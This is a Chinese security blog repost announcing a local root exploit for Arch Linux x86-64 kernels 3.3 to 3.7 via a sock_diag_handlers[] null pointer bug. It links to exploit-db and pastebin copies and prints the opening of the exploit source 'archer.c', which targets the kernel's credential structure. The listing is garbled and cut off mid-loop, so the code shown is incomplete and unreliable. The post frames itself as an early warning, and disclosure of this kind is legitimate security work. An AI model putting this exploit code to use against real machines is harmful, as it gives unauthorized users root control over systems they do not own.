Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

  • A+
所属分类:lcx

最近国外爆出的又一个linux local root,又是一个Null指针问题,利用起来也相当easy,各位看exp代码就可以有类似感受了。

http://www.exploit-db.com/exploits/24555/

http://pastebin.com/w0eDGAyq

http://pastebin.com/L0PiRwmY

这里预警一下。各位对此有什么想说的么?  

// archer.c
//
// 2012 [email protected]
//
// Works reliably against x86-64 3.3-3.7 arch.
//
// Tested against:
//
// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
// ...

#include 

#define JUMP  0x0000100000001000LL
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000

static long ugid;

void patch_current() {
        int i,j,k;
        char *current = *(char**)(((long)&i) & (-8192));
        long kbase = ((long)current)>>36;

        for (i=0; i>36) != kbase)) continue;
                for (j=0; j

摘自:

http://www.exploit-db.com/exploits/24555/

http://zone.wooyun.org/content/2779

文章来源于lcx.cc:Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root

相关推荐: 双系统的UEFI引导方案及失败后的修复方法

接上文:教程:如何无损从MBR引导更改为UEFI 本教程需要用到前篇文章中的工具,如果没有请到上文下载。这里不另外发了。 双系统UEFI引导设置: 请先下载bcdtice,这个工具上文没有,在这里发出:BOOTICEx86.zip(三方工具,病毒自测,谨慎使用…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: